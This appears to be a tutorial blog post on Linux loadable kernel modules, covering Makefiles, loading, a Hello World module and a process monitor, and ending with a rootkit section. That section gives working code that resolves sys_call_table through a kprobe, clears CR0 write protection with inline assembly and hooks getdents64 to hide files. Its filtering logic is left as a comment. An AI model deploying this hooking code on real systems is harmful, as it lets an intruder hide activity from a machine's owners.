Hey folks! Today, I’m going to walk you through LKMs (Loadable Kernel Modules)—from a simple "Hello World" module all the way to creating an LKM rootkit. If you find this helpful, feel free to share it, and thanks in advance to everyone who reads till the end. You'll find all the code and references linked at the bottom of the post, so be sure to check out the sources. Trust me, digging into those and modifying the code will really help you learn more. Heads-up though—some of the code is under the GPL 3 license, so make sure you’re aware of the terms.
What You’ll Need:
- linux-headers for the kernel you are running (linux-headers-generic on Debian/Ubuntu; /lib/modules/$(uname -r)/build must exist after installing)
- GCC and make (use the same compiler family your kernel was built with; /proc/version shows which one that was)
Table of Contents:
- 1) What is LKM and how it works
- 2) Example LKM Makefile
- 3) How modules get loaded into the kernel
- 4) LKM "Hello World"
- 5) Key changes over the years
- 6) Syscall table changes in Kernel 5.7
- 7) LKM for process monitoring
- 8) Building an LKM rootkit
1) What is LKM and how it works:
LKMs are Loadable Kernel Modules: code the Linux kernel can load at runtime to extend itself, such as a driver for a piece of hardware, without recompiling or rebooting the kernel. They are the normal vehicle for device drivers (sound cards, watchdogs), filesystems, network protocols and so on. Every LKM needs an entry point that runs when it is loaded and, if it is to be unloadable, a cleanup function that runs on rmmod. Both are registered with the module_init() and module_exit() macros, so do not name your own functions module_init/module_exit (that collides with the macros from linux/module.h):

```c
#include <linux/module.h>

static int __init example_init(void)
{
    return 0;   /* 0 means "loaded"; a negative errno makes insmod fail */
}

static void __exit example_exit(void)
{
}

module_init(example_init);
module_exit(example_exit);
MODULE_LICENSE("GPL");
```
2) Example LKM Makefile:
Here's a super simple Makefile for compiling your module:

```makefile
obj-m := example.o
KDIR  := /lib/modules/$(shell uname -r)/build
PWD   := $(shell pwd)

all:
	$(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
	$(MAKE) -C $(KDIR) M=$(PWD) clean
```

Recipe lines must start with a tab, not spaces, or make rejects the file. The -C $(KDIR) M=$(PWD) invocation hands the build to the kernel's own build system (kbuild), which is why the headers have to be installed: /lib/modules/$(uname -r)/build points at them. Running make in this directory produces example.ko.
3) How Modules Get Loaded into the Kernel:
You can see the modules currently loaded with the lsmod command, which just formats /proc/modules (one line per module: name, size, reference count, who uses it, state, load address). Loading usually happens on demand rather than by hand: when the kernel needs a driver it does not have, it calls request_module(), which runs modprobe with an alias describing what is needed, for example:
alias char-major-10-30 softdog
An alias line like this in a modprobe configuration file (/etc/modprobe.d/*.conf) tells modprobe that a request for character device major 10, minor 30 is satisfied by loading softdog.ko. Before inserting it, modprobe consults /lib/modules/$(uname -r)/modules.dep, which depmod -a generates from the symbols each module imports and exports, and inserts softdog's dependencies first.
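To make the dependency step concrete, here is an added example (my own code, not from the original post or any of the projects it credits) that reads text in the modules.dep format and works out the insmod order modprobe would use: every dependency before the module that needs it, each module once. The sample modules.dep is constructed for the example; its dependency edges are illustrative and not copied from a real kernel.

```c
#include <stdio.h>
#include <string.h>

#define MAX_MODS 32
#define NAME_LEN 64

/* Constructed sample in the format depmod writes to modules.dep:
 * "<path>.ko: <dep path>.ko <dep path>.ko ..." (the list may be empty).
 * The edges are illustrative only. */
const char *sample_modules_dep =
    "kernel/drivers/watchdog/softdog.ko:\n"
    "kernel/fs/ext4/ext4.ko: kernel/lib/crc16.ko kernel/fs/mbcache.ko kernel/fs/jbd2/jbd2.ko\n"
    "kernel/lib/crc16.ko:\n"
    "kernel/fs/mbcache.ko:\n"
    "kernel/fs/jbd2/jbd2.ko: kernel/lib/crc16.ko\n";

/* Reduce "kernel/fs/ext4/ext4.ko" (len bytes, not NUL terminated) to "ext4",
 * which is the name modprobe and lsmod use. */
static void modname(const char *path, size_t len, char *out)
{
    const char *base = path;
    for (size_t i = 0; i < len; i++)
        if (path[i] == '/')
            base = path + i + 1;
    size_t n = len - (size_t)(base - path);
    if (n >= 3 && strncmp(base + n - 3, ".ko", 3) == 0)
        n -= 3;
    if (n >= NAME_LEN)
        n = NAME_LEN - 1;
    memcpy(out, base, n);
    out[n] = '\0';
}

/* Locate the modules.dep line for `name`; return the text after ':' and its
 * length, or NULL if the module is not listed. */
static const char *find_deps(const char *dep_text, const char *name, size_t *len)
{
    const char *line = dep_text;
    while (*line) {
        const char *eol = strchr(line, '\n');
        if (!eol)
            eol = line + strlen(line);
        const char *colon = memchr(line, ':', (size_t)(eol - line));
        if (colon) {
            char n[NAME_LEN];
            modname(line, (size_t)(colon - line), n);
            if (strcmp(n, name) == 0) {
                *len = (size_t)(eol - colon - 1);
                return colon + 1;
            }
        }
        if (!*eol)
            break;
        line = eol + 1;
    }
    return NULL;
}

struct order { char name[MAX_MODS][NAME_LEN]; int count; };

static int seen(const struct order *o, const char *name)
{
    for (int i = 0; i < o->count; i++)
        if (strcmp(o->name[i], name) == 0)
            return 1;
    return 0;
}

/* Post-order DFS: dependencies are emitted before the module that needs
 * them and nothing is emitted twice, which is the order modprobe inserts
 * modules. Returns 0 on success, -1 for an unknown module or overflow. */
static int visit(const char *dep_text, const char *name, struct order *o)
{
    if (seen(o, name))
        return 0;
    size_t len;
    const char *deps = find_deps(dep_text, name, &len);
    if (!deps)
        return -1;
    const char *p = deps, *end = deps + len;
    while (p < end) {
        while (p < end && *p == ' ')
            p++;
        const char *tok = p;
        while (p < end && *p != ' ')
            p++;
        if (p > tok) {
            char dep[NAME_LEN];
            modname(tok, (size_t)(p - tok), dep);
            if (visit(dep_text, dep, o) < 0)
                return -1;
        }
    }
    if (o->count >= MAX_MODS)
        return -1;
    strcpy(o->name[o->count++], name);
    return 0;
}

int load_order(const char *dep_text, const char *target, struct order *o)
{
    o->count = 0;
    return visit(dep_text, target, o);
}

int main(void)
{
    struct order o;
    if (load_order(sample_modules_dep, "ext4", &o) < 0)
        return 1;
    for (int i = 0; i < o.count; i++)
        printf("insmod %s\n", o.name[i]);   /* crc16, mbcache, jbd2, ext4 */
    return 0;
}
```

Point the function at the real file (/lib/modules/$(uname -r)/modules.dep) and it prints the same sequence modprobe -v shows; a module that is missing from the file is what you get when depmod has not been rerun after installing a new .ko.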
4) LKM "Hello World":
Here's how to make a super basic "Hello World" module. Build it with the Makefile above (obj-m := hello.o), load it with sudo insmod hello.ko, look for the message in dmesg, and unload it with sudo rmmod hello; the exit message appears in dmesg at that point.

```c
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>

static int __init hello_init(void)
{
    printk(KERN_INFO "Hello World\n");
    return 0;
}

static void __exit hello_exit(void)
{
    printk(KERN_INFO "Bye bye!\n");
}

module_init(hello_init);
module_exit(hello_exit);

MODULE_AUTHOR("BrunoCiccarino");
MODULE_LICENSE("GPL");
```
5) Key Changes in LKM over the Years:
There have been some pretty significant changes in LKMs over time, so let’s break them down by Linux kernel version:
Kernel 2.x (up to 2.6):
- Initial support for dynamically loading and unloading modules.
- Better debugging facilities (oops and panic reports).
Kernel 2.6.x:
- Introduction of udev for device management.
- Preemptible kernel for lower latency.
- Native POSIX Thread Library (NPTL) improves handling of multithreaded processes.
Kernel 3.x:
- Namespaces filled out (user namespaces in 3.8), the isolation that container tooling such as Docker builds on.
- Filesystem and GPU driver improvements.
Kernel 4.x:
- KASLR (merged in 3.14) is switched on by default from 4.12, so kernel addresses, sys_call_table included, differ on every boot and hardcoded addresses stop working.
- Better container support (cgroup v2 in 4.5, namespaces).
- x86-64 syscall wrappers (4.17): a syscall handler now receives a single struct pt_regs * instead of the raw arguments, which changes how a syscall hook must be written.
- New hardware support.
Kernel 5.x:
- Filesystem encryption and live-patching improvements.
- BPF grows beyond networking (tracing, and from 5.7 LSM hooks).
- CR0 pinning (5.3): write_cr0() refuses to clear the WP bit.
- Better RISC-V and ARM support.
Kernel 5.7:
- Major change for module writers: kallsyms_lookup_name() is no longer exported to modules, so the usual way of locating sys_call_table breaks. Modules that patch the table had to find it another way (more in section 6).
Kernel 6.x:
- Rust support (6.1) for writing modules in a memory-safe language.
- Security and isolation improvements, with attention to energy efficiency on mobile devices.
6) Changes in the Syscall Table in Kernel 5.7:
In Linux 5.7, kallsyms_lookup_name() and kallsyms_on_each_symbol() stopped being exported to modules. Out-of-tree code used that function to resolve unexported symbols such as sys_call_table, so the one-line lookup no longer links. The common workaround is to register a kprobe on the symbol "kallsyms_lookup_name": the kprobe machinery resolves the address for you, you read it from kp.addr, unregister the probe and call the function yourself (section 8 shows the code). Write protection of the table is a separate and older matter: sys_call_table lives in read-only data, and CR0.WP makes the CPU enforce that even in ring 0, so patching an entry means clearing the WP bit for the duration of the write. Since 5.3 write_cr0() pins that bit and will not clear it, which is why rootkits write CR0 with inline assembly instead. Both tricks are good detection signals: a normal driver has no reason to register a kprobe on kallsyms_lookup_name or to touch CR0.
7) LKM for Process Monitoring:
This is a module that walks the kernel's task list from a kernel timer every 2 seconds and logs every process it finds (name and PID). On its own it only reports what is in the task list at that instant; to turn it into creation/termination monitoring you diff successive passes, and file or network activity is not visible from the task list at all (that needs syscall hooks or tracepoints).
Here’s a bit of code to get you started with that:
```c
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/timer.h>
#include <linux/jiffies.h>
#include <linux/sched.h>
#include <linux/sched/signal.h>   /* for_each_process() */

static struct timer_list procmonitor_timer;

/* Timer callback: runs in softirq context, so it must not sleep.
 * setup_timer() was removed in 4.15; timer_setup() passes the timer
 * itself to the callback instead of an unsigned long cookie. */
static void procmonitor_check_proc_tree(struct timer_list *t)
{
    struct task_struct *task;

    rcu_read_lock();                 /* the task list is RCU protected */
    for_each_process(task)
        printk(KERN_INFO "process: %s, PID: %d\n", task->comm, task->pid);
    rcu_read_unlock();

    mod_timer(t, jiffies + msecs_to_jiffies(2000));   /* re-arm: every 2 s */
}

static int __init procmonitor_init(void)
{
    timer_setup(&procmonitor_timer, procmonitor_check_proc_tree, 0);
    mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(200));
    return 0;
}

static void __exit procmonitor_exit(void)
{
    del_timer_sync(&procmonitor_timer);   /* wait for a running callback to finish */
}

module_init(procmonitor_init);
module_exit(procmonitor_exit);
MODULE_LICENSE("GPL");
```
8) LKM Rootkits:
Rootkits are malicious modules that hook system calls (or other kernel functions) so that files, processes or connections stop showing up. The classic technique is to overwrite an entry of sys_call_table with your own function and forward to the original. Here is how the pieces fit together on x86-64; the snippets below belong in one source file, with the hook defined before ghost_init.
First, you need to locate the syscall table. Because kallsyms_lookup_name() is no longer exported (5.7), a kprobe on it is registered just long enough to learn its address:

```c
#include <linux/module.h>
#include <linux/kprobes.h>
#include <linux/ptrace.h>
#include <linux/dirent.h>
#include <asm/unistd.h>
#include <asm/special_insns.h>   /* read_cr0() */

/* kallsyms_lookup_name() is not exported since 5.7, but registering a
 * kprobe on the symbol still resolves its address for us. */
static struct kprobe kp = {
    .symbol_name = "kallsyms_lookup_name",
};

typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);

static unsigned long *find_syscall_table(void)
{
    kallsyms_lookup_name_t kallsyms_lookup_name;

    if (register_kprobe(&kp) < 0)
        return NULL;
    kallsyms_lookup_name = (kallsyms_lookup_name_t)kp.addr;
    unregister_kprobe(&kp);

    return (unsigned long *)kallsyms_lookup_name("sys_call_table");
}
```

Then, you can unprotect the memory where the syscall table is. It sits in read-only data, and CR0.WP makes the CPU honour that in ring 0, so bit 16 of CR0 is cleared for the duration of the write. CR0 is per-CPU, and write_cr0() refuses to clear WP since 5.3, hence the inline assembly; preemption has to stay disabled between unprotect and protect so the write lands on the CPU whose WP bit was cleared:

```c
static unsigned long cr0;   /* saved at init, with WP set */

/* Write CR0 directly: write_cr0() pins the WP bit since 5.3. */
static inline void write_cr0_forced(unsigned long val)
{
    unsigned long __force_order;

    asm volatile("mov %0, %%cr0" : "+r"(val), "+m"(__force_order));
}

static inline void unprotect_memory(void)
{
    write_cr0_forced(cr0 & ~0x00010000);   /* clear CR0.WP (bit 16) */
}

static inline void protect_memory(void)
{
    write_cr0_forced(cr0);                 /* restore WP */
}
```

After that, replace the original function with your hook, keeping the original pointer so calls can be forwarded and so the entry can be put back on unload. Without the restore, rmmod leaves the table pointing into freed memory and the next directory listing crashes the machine:

```c
static unsigned long *__syscall_table;
static asmlinkage long (*orig_getdents64)(const struct pt_regs *regs);
static asmlinkage long hook_getdents64(const struct pt_regs *regs);

static int __init ghost_init(void)
{
    __syscall_table = find_syscall_table();
    if (!__syscall_table)
        return -ENOENT;

    cr0 = read_cr0();
    orig_getdents64 = (void *)__syscall_table[__NR_getdents64];

    preempt_disable();
    unprotect_memory();
    __syscall_table[__NR_getdents64] = (unsigned long)hook_getdents64;
    protect_memory();
    preempt_enable();
    return 0;
}

static void __exit ghost_exit(void)
{
    preempt_disable();
    unprotect_memory();
    __syscall_table[__NR_getdents64] = (unsigned long)orig_getdents64;
    protect_memory();
    preempt_enable();
}

module_init(ghost_init);
module_exit(ghost_exit);
MODULE_LICENSE("GPL");
```

The hook function intercepts getdents64 and hides files. Since 4.17 an x86-64 syscall handler receives a single struct pt_regs * rather than the raw arguments, so the hook must use that signature and pull fd, dirp and count out of the register struct (di, si, dx); the elided part copies the user buffer in, drops the entries to hide, copies it back and returns the shortened length:

```c
static asmlinkage long hook_getdents64(const struct pt_regs *regs)
{
    struct linux_dirent64 __user *dirp = (struct linux_dirent64 __user *)regs->si;
    long ret = orig_getdents64(regs);   /* let the real syscall fill dirp */

    // Intercept the syscall here: copy_from_user() the `ret` bytes at dirp,
    // remove the records to hide, copy_to_user() the rest and return its length.
    (void)dirp;
    return ret;
}
```
Credits:
- The Hacker's Choice
- elinux
- Kernel BR
- xcellerator
- lkmpg
- Cat lover
- My rootkit
- Diamorphine
The above is the detailed content of LKM Addict, learning the basics of lkm. For more information, please follow other related articles on the PHP Chinese website!